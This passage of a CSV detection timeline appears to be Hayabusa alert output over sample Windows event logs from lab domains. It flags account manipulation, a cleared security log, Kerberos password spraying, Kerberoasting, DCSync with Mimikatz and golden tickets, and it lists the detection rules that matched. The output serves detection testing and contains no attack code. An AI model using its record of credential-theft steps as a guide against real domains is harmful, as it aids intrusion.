CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group07 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.576 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group08",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive 
account group membership change.evtx -2020-07-12 14:19:54.576 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group08 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.578 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group09",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.578 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group09 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.580 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: 
Group10",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.580 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group10 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.582 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group11",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:19:54.582 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1150 : Group: Group11 : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx -2020-07-12 14:27:05.579 +09:00,fs02.offsec.lan,4825,medium,Denied Access To Remote 
Desktop,,rules/sigma/builtin/security/win_not_allowed_rdp_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4825-Denied RDP connection with valid credentials.evtx -2020-07-12 14:28:26.831 +09:00,fs02.offsec.lan,4825,medium,Denied Access To Remote Desktop,,rules/sigma/builtin/security/win_not_allowed_rdp_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4825-Denied RDP connection with valid credentials.evtx -2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,high,User added to local Domain Admins group,"User: CN=honey-pot1,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1159 : Group: Domain Admins",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalDomainAdminsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx -2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,high,User added to the global Domain Admins group,"Member added: CN=honey-pot1,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1159 : Group: Domain Admins : Subject user: lambda-user : Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalDomainAdmins.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx -2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=honey-pot1,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan : SID: S-1-5-21-4230534742-2542757381-3142984815-1159 : Group: Domain Admins : Subject user: lambda-user : Subject domain: 
OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx -2020-07-13 04:45:00.670 +09:00,rootdc1.offsec.lan,4720,high,Hidden user account created! (Possible Backdoor),User: FAKE-COMPUTER$ : SID:S-1-5-21-4230534742-2542757381-3142984815-1168,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Fake computer account created.evtx -2020-07-13 17:34:33.915 +09:00,rootdc1.offsec.lan,4794,high,Password Change on Directory Service Restore Mode (DSRM) Account,,rules/sigma/builtin/security/win_susp_dsrm_password_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4794-4688-DSRM password set with NTDSutil.evtx -2020-07-19 22:06:52.199 +09:00,01566s-win16-ir.threebeesco.com,5145,critical,Protected Storage Service Access,,rules/sigma/builtin/security/win_protected_storage_service_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_protectedstorage_5145_rpc_masterkey.evtx -2020-07-23 05:29:27.321 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx -2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: HD01 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx -2020-07-23 
05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: admin : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx -2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: svc-02 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx -2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: HD02 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx -2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: svc-01 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx -2020-07-23 05:29:36.415 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: bob : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx -2020-07-23 05:29:36.415 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: 
admin02 : Service: krbtgt/THREEBEESCO.COM : IP Address: 172.16.66.1 : Status: 0x6 : PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx -2020-07-23 05:29:36.434 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: normal : Service: krbtgt : IP Address: 172.16.66.1 : Status: 0x0 : PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx -2020-07-23 05:29:36.437 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: normal : Service: krbtgt : IP Address: ::ffff:172.16.66.1 : Status: 0x0 : PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx -2020-07-27 07:26:14.523 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx -2020-07-27 07:26:14.523 +09:00,MSEDGEWIN10,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx -2020-07-27 07:26:15.141 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx -2020-08-02 20:21:46.062 +09:00,rootdc1.offsec.lan,4662,medium,AD User 
Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:21:46.068 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:21:46.078 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:21:46.083 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:21:46.088 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:21:46.094 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:21:46.100 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes 
accessed.evtx -2020-08-02 20:21:46.110 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:21:46.117 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:21:46.153 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:21:46.166 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:21:46.181 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:21:46.181 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx -2020-08-02 20:33:06.521 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: : Service: : IP Address: ::ffff:10.23.23.9 : Status: 
0x25,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx -2020-08-02 20:33:06.523 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: Svc-SQL-DB01 : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx -2020-08-02 20:33:06.523 +09:00,rootdc1.offsec.lan,4769,medium,Suspicious Kerberos RC4 Ticket Encryption,,rules/sigma/builtin/security/win_susp_rc4_kerberos.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx -2020-08-02 20:37:11.847 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::1 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx -2020-08-02 20:37:12.567 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::1 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx -2020-08-02 20:37:54.898 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: 
ROOTDC1$ : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx -2020-08-02 20:37:54.999 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: WEC01$ : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx -2020-08-02 20:37:55.142 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: ROOTDC2$ : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx -2020-08-02 20:37:55.483 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx -2020-08-02 20:37:55.484 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos 
Tickets/ID4769-Kerberoast ticket with low encryption.evtx -2020-08-02 20:37:55.625 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.42.22 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx -2020-08-02 21:02:34.103 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55731 : LogonID: 0x11b8c41e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx -2020-08-02 21:02:35.117 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55731 : LogonID: 0x11b8c703,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx -2020-08-02 21:02:37.166 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55733 : LogonID: 0x11b8c741,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx -2020-08-02 21:03:03.560 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: ROOTDC1$ : Workstation: - : IP Address: fe80::1cae:5aa4:9d8d:106a : Port: 58736 : LogonID: 
0x11b8cd00,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx -2020-08-02 21:03:08.715 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: FS02$ : Workstation: - : IP Address: 10.23.42.18 : Port: 62274 : LogonID: 0x11b8d014,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx -2020-08-02 21:03:12.993 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55738 : LogonID: 0x11b8d057,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx -2020-08-02 21:04:02.850 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55748 : LogonID: 0x11b8dcc1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx -2020-08-02 21:04:09.689 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 54927 : LogonID: 0x11b9e9a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx -2020-08-02 21:04:09.695 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 54931 : LogonID: 
0x11b9e9c0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx -2020-08-02 21:04:09.696 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 54933 : LogonID: 0x11b9e9d3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx -2020-08-02 21:04:09.696 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 54932 : LogonID: 0x11b9e9e5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx -2020-08-02 21:04:09.816 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 55750 : LogonID: 0x11b9ea1f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx -2020-08-02 21:26:03.702 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: ROOTDC2$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx -2020-08-02 21:26:11.437 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: 
ROOTDC2$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx -2020-08-02 21:26:20.424 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx -2020-08-02 21:27:02.387 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx -2020-08-02 21:27:19.056 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::1 : Status: 